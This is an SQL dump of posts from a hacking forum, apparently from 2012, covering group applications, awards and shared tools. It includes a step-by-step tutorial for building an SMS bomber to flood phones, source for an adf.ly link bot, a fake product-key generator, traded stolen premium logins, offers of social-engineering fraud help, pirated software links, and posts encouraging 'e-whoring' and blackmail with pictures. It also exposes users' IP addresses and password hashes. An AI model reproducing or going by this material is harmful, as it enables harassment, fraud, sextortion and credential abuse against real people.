'Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1345858254', 'All official groups would have their own Userbar, Forum and Usertitle.\n\nEach group will have a leader, there can be 3 maximum leaders per group. Only leaders are allowed to create recruitment threads for their [b]own[/b] groups. \n\n[size=large][b]How to create a group?[/b][/size]\n\nFill in the application below and you must meet the requirements.\n\n[b]Requirements[/b]\n[list]\n[*] Must have 50+ Posts\n[*] Must have 2+ Positive Rep\n[*] You must be registered and active for over a week.\n[/list]\n\n[b]Application[/b]\n\n[code]\n[b]Name of group:[/b]\n[b]Group Description:[/b]\n[b]Group Userbar:[/b]\n[b]Forum Name:[/b]\n[b]Forum Icon(34x34):[/b] \n[b]Why LH should make this group official:[/b]\n[/code]\n\n[size=large][b]Things needed after becoming official[/b][/size]\n[list]\n[*] Userbar\n[*] Forum Icon\n[/list]\n\n[size=large][b]Current Offical Groups[/b][/size]\n\n[img]http://l33thacking.net/images/ub/Coders.png[/img]\n\n[img]http://l33thacking.net/images/ub/unique.gif[/img]\n\n[img]http://l33thacking.net/images/ub/gamer.png[/img]\n\n[img]http://l33thacking.net/images/ub/ddosers.gif[/img]\n\n[img]http://l33thacking.net/images/ub/marketers.gif[/img]', '41.174.16.66', '699273282', '1', '0', '1', '1351134010', '1', '75fdcc0f7d41d7ae5237f27b428d8533', '0', '1351134010'); INSERT INTO mybb_posts VALUES('850', '213', '0', '58', 'What group(s) would you like to see?', '0', '20', 'JakeUS', '1345858295', 'This thread is open for discussion about what group(s) the members would like to see.\r\n\r\nPost away.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '005a2b52bfd48fad428307600a3110fe', '0', '0'); INSERT INTO mybb_posts VALUES('851', '213', '850', '58', 'RE: What group(s) would you like to see?', '0', '1', 't3h jok3r', '1345858353', 'I thought I made an application for it. Anyway, doesn\'t matter.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '173a90ee3ec408d04ff72ddc4c969e0a', '0', '0'); INSERT INTO mybb_posts VALUES('852', '208', '846', '7', 'RE: I m feeling happy ;)', '0', '1', 't3h jok3r', '1345858539', '[quote=\'Baws\' pid=\'846\' dateline=\'1345858066\']\r\nI don\'t get why HF is censored, that\'s where I got here from.\r\n[/quote]\r\n\r\nWe censored HF because in future when we will be getting high traffic and people see links or discussions on HF then we would lose traffic as HF is a bigger site than us with more content.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'ea3e5b4bfc3df781cbf9ac56a33a956a', '0', '0'); INSERT INTO mybb_posts VALUES('853', '206', '833', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345858722', '[quote=\'iTzIpod\' pid=\'833\' dateline=\'1345853367\']\r\n[quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\']\r\n[quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\']\r\n[quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\']\r\nNice mask, you been granted the SWAG award. Enjoy.\r\n[/quote]\r\n\r\nThanks bro :D\r\n[/quote]\r\n\r\nNo problem. You deserved it after all.\r\n[/quote]\r\n\r\n\r\n\r\nYou gotta post a picture of yourself on the forum looking all swag just to receive the award?\r\n[/quote]\r\n\r\nWe have a Help Document for the [url=http://l33thacking.com/misc.php?action=help&hid=12]Awards Sytem[/url]. To get the swag award, you have be FLEE (In other words, cool or unique). You can get the swag award by showing us some expensive merchandise or a unique accessories/clothing/footwear product.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '882a636c66ecc6ac67300acb45422c07', '0', '0'); INSERT INTO mybb_posts VALUES('854', '183', '620', '54', 'RE: 2x PlayBoy Premium', '0', '1', 't3h jok3r', '1345858851', 'Is it possible to get any girls cell number from that site? JK \n\nThanks for the logins. \n\n[b]Edited[/b]\n\nHow to login? :(', '41.174.16.66', '699273282', '1', '0', '1', '1345858902', '1', '785738ff8ed576236722e1bfa04062be', '0', '1345858902'); INSERT INTO mybb_posts VALUES('855', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '1', 't3h jok3r', '1345859018', 'Mayne, how can someone not post on my fav. PID generator?', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '8574779e5ce823c5c1b7fe0faf725d1a', '0', '0'); INSERT INTO mybb_posts VALUES('856', '214', '0', '52', '[tut] Creating a IPod PID Generator', '0', '4', 'Triple H', '1345859244', '[code]\r\nPublic Function GenIPod()\r\n\r\nDim Letters As String\r\nDim StrSplit() As String\r\nDim temp As String\r\n\r\n Letters = \"A B C D E F G H I J K L M N O P Q R S T U V W X Y Z\" \'// Define letters\r\n StrSplit = Split(Letters, \" \") \'// Split letters by a space\r\n\r\n temp = Int(Rnd * 10) & StrSplit(Int(Rnd * UBound(StrSplit))) & StrSplit(Int(Rnd * UBound(StrSplit)))\r\n \r\n\r\n Msgbox \"CCQDL\" + temp + \"DCP7\"\r\n\r\nEnd Function\r\n[/code]\r\n\r\nThen on Form_Load you would put\r\n\r\nRandomize\r\ngenIpod\r\n\r\nCredits: pastebin.com', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'aaf47b2226850c07dba8933506f10ad2', '0', '0'); INSERT INTO mybb_posts VALUES('857', '215', '0', '52', 'Adf.ly BOT source code', '0', '4', 'Triple H', '1345859357', '[code]\r\nImports System.IO\r\nImports System.Text.RegularExpressions\r\nImports System.Net\r\nImports System.Threading\r\nPublic Class Form1\r\n\r\n Private Sub FutureButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton1.Click\r\n Close()\r\n End Sub\r\n\r\n Private Sub FutureButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton2.Click\r\n Me.WindowState = FormWindowState.Minimized\r\n End Sub\r\n\r\n Private Sub LinkLabel1_LinkClicked(ByVal sender As System.Object, ByVal e As System.Windows.Forms.LinkLabelLinkClickedEventArgs) Handles LinkLabel1.LinkClicked\r\n System.Diagnostics.Process.Start(\"http://Gr3eNoX.blogspot.com\")\r\n End Sub\r\n\r\n Private Sub FutureButton3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton3.Click\r\n If TextBox1.Text.StartsWith(\"http://adf.ly/\") Or TextBox1.Text.StartsWith(\"http://www.adf.ly/\") Then\r\n ListBox1.Items.Add(TextBox1.Text)\r\n End If\r\n If TextBox1.Text.StartsWith(\"adf.ly/\") Or TextBox1.Text.StartsWith(\"www.adf.ly/\") Then\r\n ListBox1.Items.Add(\"http://\" & TextBox1.Text)\r\n End If\r\n End Sub\r\n\r\n Private Sub FutureButton4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton4.Click\r\n OpenFileDialog1.ShowDialog()\r\n Try\r\n\r\n If OpenFileDialog1.FileName = \"Select A File\" Or OpenFileDialog1.FileName = \"\" Then\r\n Else\r\n Dim loader As New StreamReader(OpenFileDialog1.FileName)\r\n While (loader.Peek() > -1)\r\n Dim link As String = loader.ReadLine\r\n If link.StartsWith(\"http://adf.ly/\") Or link.StartsWith(\"http://www.adf.ly/\") Then\r\n ListBox1.Items.Add(link)\r\n ElseIf link.StartsWith(\"adf.ly/\") Or link.StartsWith(\"www.adf.ly/\") Then\r\n ListBox1.Items.Add(\"http://\" & link)\r\n End If\r\n End While\r\n loader.Close()\r\n ProgressBar1.Maximum = ListBox1.Items.Count\r\n End If\r\n Catch ex As Exception\r\n MessageBox.Show(ex.Message)\r\n End Try\r\n End Sub\r\n\r\n Private Sub FutureButton6_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton6.Click\r\n Dim thr As New Thread(AddressOf getlnk)\r\n thr.IsBackground = True\r\n thr.Start()\r\n End Sub\r\n Sub getlnk()\r\n For Each lnk In ListBox1.Items\r\n Dim req As HttpWebRequest = HttpWebRequest.Create(lnk)\r\n Dim res As HttpWebResponse = req.GetResponse\r\n Dim rdr As New StreamReader(res.GetResponseStream())\r\n Dim src As String = rdr.ReadToEnd\r\n res.Close()\r\n Dim reg As New Regex(\"var url = \'.*\';\")\r\n Dim match As Match = reg.Match(src)\r\n Dim link1 As String = match.ToString\r\n Dim link2 As String = link1.Split(\"\'\").GetValue(1)\r\n Dim link3 As String = link2.Split(\"\'\").GetValue(0)\r\n ListBox2.Items.Add(link3)\r\n ProgressBar1.Value = ProgressBar1.Value + 1\r\n If ProgressBar1.Value = ProgressBar1.Maximum Then ProgressBar1.Value = ProgressBar1.Minimum\r\n Next\r\n End Sub\r\n\r\n Private Sub Form1_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load\r\n Control.CheckForIllegalCrossThreadCalls = False\r\n End Sub\r\n\r\n Private Sub FutureButton7_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton7.Click\r\n Clipboard.SetText(ListBox2.SelectedItem.ToString())\r\n End Sub\r\n\r\n Private Sub FutureButton5_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton5.Click\r\n SaveFileDialog1.ShowDialog()\r\n Try\r\n\r\n If SaveFileDialog1.FileName = \"\" Or SaveFileDialog1.FileName = \"Enter The File Name\" Then\r\n MessageBox.Show(\"Please enter the filename\", \"Error\", MessageBoxButtons.OK, MessageBoxIcon.Error)\r\n Else\r\n Dim riter As New StreamWriter(SaveFileDialog1.FileName)\r\n For Each xlink In ListBox2.Items\r\n riter.WriteLine(xlink)\r\n Next\r\n riter.Close()\r\n End If\r\n Catch ex As Exception\r\n MessageBox.Show(ex.Message, \"Error\", MessageBoxButtons.OK, MessageBoxIcon.Error)\r\n End Try\r\n End Sub\r\nEnd Class\r\n[/code]\r\n\r\n[color=#FFA500][b][align=center]All credits go to the coder, Gr3eNoX.[/align][/b][/color]', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'dd793e6c8118abc3a71355bd79c3d9ac', '0', '0'); INSERT INTO mybb_posts VALUES('858', '216', '0', '52', 'Making a world wide SMS Bomber in VB.net - TUT', '0', '4', 'Triple H', '1345859626', 'So to start off open Visual Basic then go to New ProjectThen Click here \r\n\r\n[img]http://gyazo.com/3d4217be91f755d241c393acd7accfa7.png[/img]\r\n\r\nThen you need to add\r\n* 4 Text Boxes\r\n* 2 Buttons\r\n* 1 Rich Text Box\r\n* 1 Combo Box\r\nLike This\r\n\r\n[img]http://gyazo.com/60742092807dcc6facbcd5978cd7cc3a.png[/img]\r\n\r\nThen right click on the form and click view code add this\r\n\r\n[code]\r\nImports System.Web\r\nImports System.IO\r\nImports System.Net.Mail\r\n[/code]\r\n\r\nThen, go back to your Design, and double click Button1, and add this,\r\n\r\nhttp://pastebin.com/dcfuH7nA\r\n\r\nThen, double click button2, and add this\r\n\r\n[code]\r\nEnd\r\n[/code]\r\n\r\n[img]http://gyazo.com/7b63f001bc84789a9dbbbaec3e5efeaf.png[/img]\r\n\r\nAnd Add This\r\n[code]\r\n\r\nSprint PCS\r\nVerizon\r\nBoost U.S\r\nT-Mobile (Germany)\r\n7-11 Speakout\r\nAirtel (Karnataka, India)\r\nAirtel Wireless (Montana, USA)\r\nAlaska Communications Systems\r\nAql\r\nAT&T\r\nAT&T Enterprise Paging\r\nBigRedGiant Mobile Solutions\r\nBell Mobility & Solo Mobile\r\nBPL Mobile\r\nCellular One\r\nCingularCingular (Postpaid)\r\nCentennial Wireless\r\nCingular (GoPhone prepaid)\r\nClaro (Brasil)\r\nClaro (Nicaragua)\r\nComcel\r\nCricket\r\nCTI\r\nEmtel\r\nFido\r\nGeneral Communications Inc.\r\nGlobalstar (satellite)\r\nHelio\r\nIllinois Valley Cellular\r\nIridium (satellite)\r\nIusacell\r\ni wireless\r\nKoodo Mobile\r\nLMT\r\nMeteor\r\nMero Mobile\r\nMetroPCS\r\nMovicom\r\nMobitel\r\nMovistar\r\nMTN\r\nMTS\r\nNextel (United States)\r\nNextel (Argentina)\r\nOrange Polska\r\nPersonal\r\nPlus GSM\r\nPresident’s Choice\r\nQwest\r\nRogers\r\nSL Interactive\r\nSasktel\r\nSetar Mobile email (Aruba)\r\nSuncom\r\nT-Mobile (USA)\r\nT-Mobile (Austria)\r\nT-Mobile (UK)\r\nTelus Mobility\r\nThumb Cellular\r\nTigo (Formerly Ola)\r\nTracfone (prepaid)\r\nUnicel\r\nVirgin Mobile (USA)\r\nVirgin Mobile (Canada)\r\nVodacom (South Africa)\r\nVodafone (Italy)\r\nYCC\r\nMobiPCS (Hawaii only)\r\n[/code]\r\n\r\nThen Click Ok\r\nNow you might have to re-arange the text boxes for your program\r\nThen Do this\r\n\r\n[img]http://gyazo.com/bec1d431421c9d2e222c733478ec9a8c.png[/img]\r\n\r\nAnd This\r\n\r\nhttp://gyazo.com/dc7fde5e5e25be62695be9220d314262.png\r\n\r\nNow go to where you save it and there you go your own SMS Bomber.\r\n\r\nCredits: Purp\r\n\r\nIf you need any help add PURP on AIM: atvrider2381', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '8d310b0bdb0488ca42c6fe9b91ce5801', '0', '0'); INSERT INTO mybb_posts VALUES('859', '183', '854', '54', 'RE: 2x PlayBoy Premium', '0', '112', '??????Z', '1345860012', '[quote=\'t3h jok3r\' pid=\'854\' dateline=\'1345858851\']\r\nIs it possible to get any girls cell number from that site? JK \r\n\r\nThanks for the logins. \r\n\r\n[b]Edited[/b]\r\n\r\nHow to login? :(\r\n[/quote]\r\n\r\nhttp://plus.playboy.com/auth/login\r\n\r\nwouldnt mind a few of there numbers :D ;)', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'ead1b0285050cad74ca6d932cec49fbc', '0', '0'); INSERT INTO mybb_posts VALUES('860', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '1', 't3h jok3r', '1345860291', 'I can\'t code because I\'m too busy these days, but I really needed someone to make me this SMS Bomber.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'c9f84cf5a2d68f0e70fbbc0b982decd3', '0', '0'); INSERT INTO mybb_posts VALUES('861', '208', '852', '7', 'RE: I m feeling happy ;)', '0', '82', 'iTzIpod', '1345863452', '[quote=\'t3h jok3r\' pid=\'852\' dateline=\'1345858539\']\r\n[quote=\'Baws\' pid=\'846\' dateline=\'1345858066\']\r\nI don\'t get why HF is censored, that\'s where I got here from.\r\n[/quote]\r\n\r\nWe censored HF because in future when we will be getting high traffic and people see links or discussions on HF then we would lose traffic as HF is a bigger site than us with more content.\r\n[/quote]\r\n\r\nIf we try, we can become a bigger site than HF. But will take a while and [b]A LOT[/b] of advertising.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b4cedc5884fe0c3f642d8a4907684ad5', '0', '0'); INSERT INTO mybb_posts VALUES('862', '206', '853', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345863721', '[quote=\'t3h jok3r\' pid=\'853\' dateline=\'1345858722\']\r\n[quote=\'iTzIpod\' pid=\'833\' dateline=\'1345853367\']\r\n[quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\']\r\n[quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\']\r\n[quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\']\r\nNice mask, you been granted the SWAG award. Enjoy.\r\n[/quote]\r\n\r\nThanks bro :D\r\n[/quote]\r\n\r\nNo problem. You deserved it after all.\r\n[/quote]\r\n\r\n\r\n\r\nYou gotta post a picture of yourself on the forum looking all swag just to receive the award?\r\n[/quote]\r\n\r\nWe have a Help Document for the [url=http://l33thacking.com/misc.php?action=help&hid=12]Awards Sytem[/url]. To get the swag award, you have be FLEE (In other words, cool or unique). You can get the swag award by showing us some expensive merchandise or a unique accessories/clothing/footwear product.\r\n[/quote]\r\n\r\n\r\nSeems cool. Worth a shot! Might try it tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7192b50e7004835bb2390945abf315f', '0', '0'); INSERT INTO mybb_posts VALUES('863', '193', '677', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '101', 'KFallen', '1345863965', 'thanks for the stuff bro. lots of info....', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', '51b170cc56b75d6be9fbd430e1d23cda', '0', '0'); INSERT INTO mybb_posts VALUES('864', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '101', 'KFallen', '1345864305', 'Thanks for all this valuable info.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'ba8c058461d26e8cc3d5c20a776db21d', '0', '0'); INSERT INTO mybb_posts VALUES('865', '74', '633', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '101', 'KFallen', '1345864578', '[quote=\'duhuh\' pid=\'633\' dateline=\'1345671429\']\r\nCan this be removed? will anyone here actually do a survey? Sorry but I really don\'t think you should post Survey links here, its just gay as fuck.\r\n[/quote]\r\n\r\nTrue that bro.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', '845cf480aeebb0118e4d6b1ee44d31ef', '0', '0'); INSERT INTO mybb_posts VALUES('866', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '101', 'KFallen', '1345865037', 'Pretty neat looking. thnx.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'df5d8579eb80a95bd7ea98a280b81ca5', '0', '0'); INSERT INTO mybb_posts VALUES('867', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '2', 'Apathy', '1345865097', 'Cool nice share thanks.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'fe73c0b838099e8a3e3b191496f18269', '0', '0'); INSERT INTO mybb_posts VALUES('868', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '2', 'Apathy', '1345865210', 'Yea dog I will make a group called sexy mofos an only you and me in it :3', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '05003afc492c6b1ac286bfef22341c1c', '0', '0'); INSERT INTO mybb_posts VALUES('869', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '2', 'Apathy', '1345865316', 'Rep whore and post whore sound alright as well as the others but those two are more probable. The first one is not bad either.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '12ea7c3ef9767a994383651311cf3506', '0', '0'); INSERT INTO mybb_posts VALUES('870', '176', '586', '12', 'RE: [Tut]How trace an email', '0', '101', 'KFallen', '1345865946', 'beast tut bro. pretty cool.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'da9e7db3ed01d000e9beeb7adb14d58e', '0', '0'); INSERT INTO mybb_posts VALUES('871', '200', '814', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345867049', '[quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\']\r\n[quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\']\r\n[quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\']\r\nhttp://dl.dropbox.com/u/26951938/Photoshop.rar \r\n\r\nIt\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK.\r\n\r\nENJOY!\r\n[/quote]\r\n\r\nIs it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc.\r\n[/quote]\r\n\r\nIt\'s :opps:\r\n\r\nUmmm :thinking:\r\n\r\nPortable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it.\r\n[/quote]\r\n\r\nIt\'s the normal Adobe Photoshop CS6 :p \r\n\r\nPortable takes up less space. That\'s why I want to get portable.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '403d821d96b85a8162badbd33788b51b', '0', '0'); INSERT INTO mybb_posts VALUES('872', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '54', 'Sin Cara', '1345867133', '[b]Name of group:[/b] Forum Pro\n[b]Group Description:[/b] A group about forum discussion like MyBB, Vb, Ipb , Phpbb etc.\n[b]Group Userbar:[/b] [img]http://www.auplod.com/u/aodulp16a31.png[/img]\n[b]Forum Name:[/b] Official Group for forum makers\n[b]Forum Icon(34x34):[/b] [img]http://www.auplod.com/u/aupold16a32.png[/img]\n[b]Why LH should make this group official:[/b] Because its a unique and many members will love to join this ;)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'a1f7e236d70a0a27d80322f8449e74a8', '0', '0'); INSERT INTO mybb_posts VALUES('873', '193', '720', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1345867189', '[quote=\'GRONgamer61\' pid=\'720\' dateline=\'1345774110\']\r\nthe Network Security download is locked with a password... --...--\r\n[/quote]\r\n\r\nOh? I\'ll see if I can crack it. Or ask for the password :p\n[hr]\n[quote=\'KFallen\' pid=\'863\' dateline=\'1345863965\']\r\nthanks for the stuff bro. lots of info....\r\n[/quote]\r\n\r\nYou are welcome. =]', '24.212.197.164', '416597412', '1', '0', '82', '1345867748', '1', 'c01cc45928b62d6065ee6e27bc2750fd', '0', '1345867748'); INSERT INTO mybb_posts VALUES('874', '176', '586', '12', 'RE: [Tut]How trace an email', '0', '82', 'iTzIpod', '1345867236', 'Will try this and post results.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'efde34d6a81e1c9b61335d3fe7661010', '0', '0'); INSERT INTO mybb_posts VALUES('875', '24', '69', '12', 'RE: 240 Monetizing and hacking ebooks.', '0', '101', 'KFallen', '1345867324', 'Thanks for sharing. That image scared the shit out of me....', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'd00fc6265f03b5e283ef5febd19c0afd', '0', '0'); INSERT INTO mybb_posts VALUES('876', '207', '869', '3', 'RE: Suggest awards and apply for awads.', '0', '82', 'iTzIpod', '1345867358', '[quote=\'Apathy\' pid=\'869\' dateline=\'1345865316\']\r\nRep whore and post whore sound alright as well as the others but those two are more probable. The first one is not bad either.\r\n[/quote]\r\n\r\nJust saying you wrote awads in the title instead of awards*.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd4e0f672de2d6de34caf4321c8087807', '0', '0'); INSERT INTO mybb_posts VALUES('877', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '54', 'Sin Cara', '1345867378', 'Best of luck for the the future of this wonderful community ;)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '7e3ddbf50a5d400083e5935d6ea83378', '0', '0'); INSERT INTO mybb_posts VALUES('878', '213', '850', '58', 'RE: What group(s) would you like to see?', '0', '82', 'iTzIpod', '1345867692', 'I would like to see a comic/troll group. I will be filling out the application tomorrow and post it on the other thread. =]\r\n\r\nWill be looking for a co - leader too.', '24.212.197.164', '416597412', '1', '0', '82', '1345867716', '1', '3aaaf281e13f96663306b43914efa926', '0', '1345867716'); INSERT INTO mybb_posts VALUES('879', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '82', 'iTzIpod', '1345867916', 'So far, the website hasn\'t been offline! I\'m impressed. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a90254962fdccb5b823253690a1aaa22', '0', '0'); INSERT INTO mybb_posts VALUES('880', '203', '827', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1345868199', '[quote=\'duhuh\' pid=\'827\' dateline=\'1345852212\']\r\nyah first post, would love if you could help with razor? possibly thanks\r\n[/quote]\r\n\r\nI will try my best. =]\r\nJust PM me your Skype. And when I\'m available, I can give it a go.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd93efa70a28f96068358c98697b7db41', '0', '0'); INSERT INTO mybb_posts VALUES('881', '26', '718', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '82', 'iTzIpod', '1345868343', '[quote=\'t3h jok3r\' pid=\'718\' dateline=\'1345772070\']\r\n[quote=\'iTzIpod\' pid=\'676\' dateline=\'1345752102\']\r\nI never tried E-Whoring before. :/ I want to try it!\r\n[/quote]\r\n\r\nGive it a try, I bet you will succeed and I have been a pro in this shit so you have someone on LH for answers to your question(s)\r\n[/quote]\r\n\r\nThem pedophiles ain\'t buying what I be selling. (They aren\'t giving me that crack.) :/ (Crack=Money) :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd28c865885f49811e78f5707f7290345', '0', '0'); INSERT INTO mybb_posts VALUES('882', '217', '0', '24', '[Fun] Find the SEX of your Computer...!!', '0', '54', 'Sin Cara', '1345868433', '- open notepad\r\n- copy/paste\r\n\r\n[code]CreateObject(\"SAPI.SpVoice\" ).Speak\"I love YOU\"[/code]\r\n\r\n- save it (file > save as > love.vbs)\r\n- double-click it\r\n\r\nMine is female\r\n\r\nguyyyyyzzzzzzzz its really funny..:roflol::roflol::roflol:', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '57b39420b35d50d2b958f0c40e1a875a', '0', '0'); INSERT INTO mybb_posts VALUES('883', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '112', '??????Z', '1345868707', 'would love to learn some SE. currently working on the amazon one but would also like to be taught properly by you. :)', '92.22.242.209', '1545007825', '0', '0', '112', '1345868730', '1', 'db5cddd9f8a95449c3edf37fe35fddd0', '0', '1345868730'); INSERT INTO mybb_posts VALUES('884', '24', '69', '12', 'RE: 240 Monetizing and hacking ebooks.', '0', '82', 'iTzIpod', '1345868955', 'What kind of Monetizing eBooks and Hacking eBooks does this release contain?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa7ac3e6a16b97de2e8a9c567b3a967c', '0', '0'); INSERT INTO mybb_posts VALUES('885', '218', '0', '34', 'NEFantasy\'s #1 Graphic Pack (2.15 GB)', '0', '82', 'iTzIpod', '1345869611', 'This is leaked straight from the thread. I do not take credit for this. All credits go to NEFantasy.\r\n\r\n-------------------------------------------------------------------\r\n[url=http://adf.ly/CCyFn][img]http://i.minus.com/jl1OKkSa6Mvwk.png[/img][/url]\r\n\r\nPlease inform that I forgot to put the credits in the pack (sorry) I\'ve putted them into the thread design and here:\r\nhackforums.net\r\ngfxforums.net\r\nplanetrenders.net\r\ngoogle.com\r\ndeviantart.com\r\nsigtutorials.com\r\nsiglabs.com\r\nFlashy\r\n+2 more Graphic sites (which I forgot)', '24.212.197.164', '416597412', '1', '0', '82', '1347719069', '1', '07f0a8bf3f8ce00b9665671993e1e8b7', '0', '1347719069'); INSERT INTO mybb_posts VALUES('886', '203', '883', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1345870221', '[quote=\'Kennerz\' pid=\'883\' dateline=\'1345868707\']\r\nwould love to learn some SE. currently working on the amazon one but would also like to be taught properly by you. :)\r\n[/quote]\r\n\r\nI recommend you see [url=http://l33thacking.com/showthread.php?tid=94] this[/url] first. And then, PM me your Skype so we can discuss things out. When I am not busy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '41fba1224bc135a29bfc77bbb8165a66', '0', '0'); INSERT INTO mybb_posts VALUES('887', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '112', '??????Z', '1345870364', 'was actually reading through that as you posted the reply ;). will pm now', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'ba622ed2ca8c06068ebfa9f5ffdb0142', '0', '0'); INSERT INTO mybb_posts VALUES('888', '219', '0', '35', 'My Designs', '0', '82', 'iTzIpod', '1345871321', 'I\'m terrible at GFX. \nYes I know, I\'m not good with text.\n\n\nRate /10, CnC, Hate, Masturbate.\n\nName: Bowser\nI followed a tutorial.\n[img]http://i.imgur.com/17fz4.jpg[/img] \n\nName: Bored\nI followed a tutorial but changed it up a little to match my liking.\n[img]http://i.imgur.com/udd5t.jpg[/img]\nAlso, \n[img]http://i.imgur.com/42ocw.jpg[/img]\n\nName: Fail Metroid\nI followed a tutorial. But failed miserably because I rushed and was in a hurry.\n[img]http://i.imgur.com/7PJ31.png[/img]\n\nName: Totodile! <3\nI made this out of the blue. But I seem to like it! :D\n[img]http://i.imgur.com/kQFf9.png[/img] \n\nName: Link\nI made this out of the blue. \n[img]http://i.imgur.com/2YNne.png[/img]\n\n----------------------------------------------------------\n\n\nFriend\'s Designs\n\n\nNsme: Bumblebee\nWas made as a gift. I really like this one.\n[img]http://i.imgur.com/mmrzt.png[/img]\n\nName: Green Apple\nWas made as a gift. I liked this one. I wanna learn how to make it! :o\n[img]http://i.imgur.com/0Chju.jpg[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1345871658', '1', '31b2c25823bc5e9234e6bfa1eae8903e', '0', '1345871658'); INSERT INTO mybb_posts VALUES('889', '40', '100', '17', 'RE: 600 pic ewhore pack', '0', '54', 'Sin Cara', '1345885573', 'please upload in mediafire.', '119.154.66.9', '2006598153', '1', '0', '0', '0', '1', '8093a42aa6eb814281c5cb59f27aa108', '0', '0'); INSERT INTO mybb_posts VALUES('890', '212', '872', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1345898543', '[quote=\'Apathy\' pid=\'868\' dateline=\'1345865210\']\r\nYea dog I will make a group called sexy mofos an only you and me in it :3\r\n[/quote]\r\n\r\nSeems to be interesting. \r\n\r\n[quote=\'Sin Cara\' pid=\'872\' dateline=\'1345867133\']\r\n[b]Name of group:[/b] Forum Pro\r\n[b]Group Description:[/b] A group about forum discussion like MyBB, Vb, Ipb , Phpbb etc.\r\n[b]Group Userbar:[/b] [img]http://www.auplod.com/u/aodulp16a31.png[/img]\r\n[b]Forum Name:[/b] Official Group for forum makers\r\n[b]Forum Icon(34x34):[/b] [img]http://www.auplod.com/u/aupold16a32.png[/img]\r\n[b]Why LH should make this group official:[/b] Because its a unique and many members will love to join this ;)\r\n[/quote]\r\n\r\nNice group, How about people that own a site with more than 10K posts or 1K members can join the group? Your choice, it\'s your group. I can only give suggestions and you can approve them.', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', 